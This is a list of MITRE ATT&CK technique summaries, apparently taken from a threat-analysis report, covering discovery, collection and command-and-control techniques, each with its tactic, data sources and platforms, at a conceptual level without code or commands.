Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre